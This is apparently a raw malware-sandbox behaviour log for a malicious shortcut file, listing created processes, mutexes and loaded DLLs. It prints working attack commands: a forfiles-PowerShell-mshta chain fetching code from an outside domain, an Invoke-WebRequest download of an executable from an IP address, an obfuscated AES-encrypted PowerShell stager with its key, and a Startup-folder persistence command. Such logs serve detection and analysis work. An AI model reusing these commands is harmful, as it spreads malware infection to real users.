Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiuo1yij.j2r.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: R4qP4YM0QX.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/FILEANHJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANHJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetStringJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
